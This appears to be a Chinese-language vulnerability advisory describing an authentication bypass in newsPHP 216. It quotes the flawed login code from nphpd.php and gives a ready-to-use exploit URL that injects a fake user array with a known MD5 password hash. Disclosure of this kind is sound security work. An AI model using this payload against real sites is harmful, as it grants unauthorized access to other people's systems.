添加时间:
2005-08-15

系统编号:
WAVDB-00349
BUGTRAQ: 8489

影响版本:
newsPHP 216

程序介绍:

newsPHP是一款基于PHP的新闻发布程序。

漏洞分析:

newsPHP不正确处理验证过程，远程攻击者可以利用这个漏洞未授权无需密码访问newsPHP系统。

问题存在于nphpd.php中，问题代码如下：

[...]
LoadSettings($nphp_config, $nphp_users);
[...]
    for($i = 0; $i < count($nphp_users); $i++)
          {
                  if((strtolower($nphp_users[$i][0]) == strtolower($uname)) && \
($nphp_users[$i][1] == md5($pword)))  {
[...]
// hmmmm so we can inject users using nphp_users[index] in url

通过在URL中使用nphp_users[index]插入用户，并提供用户的MD5密码信息，就可以无需帐户访问系统。

漏洞利用:

http://[host]/nphp/?[action here, example: output]&
     pword=a&
     uname=[fake usernamehere]&
     nphp_users[user index here][0]=a&
     nphp_users[user index here][1]=0cc175b9c0f1b6a831c399e269772661&
     nphp_users[user index here][3]=5

解决方案:
厂商补丁：
newsPHP
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.newsphp.com/

信息来源:
<*来源：Officerrr （officerrr@poligon.com.pl）
链接：http://marc.theaimsgroup.com/?l=bugtraq&m=106194537922103&w=2
*>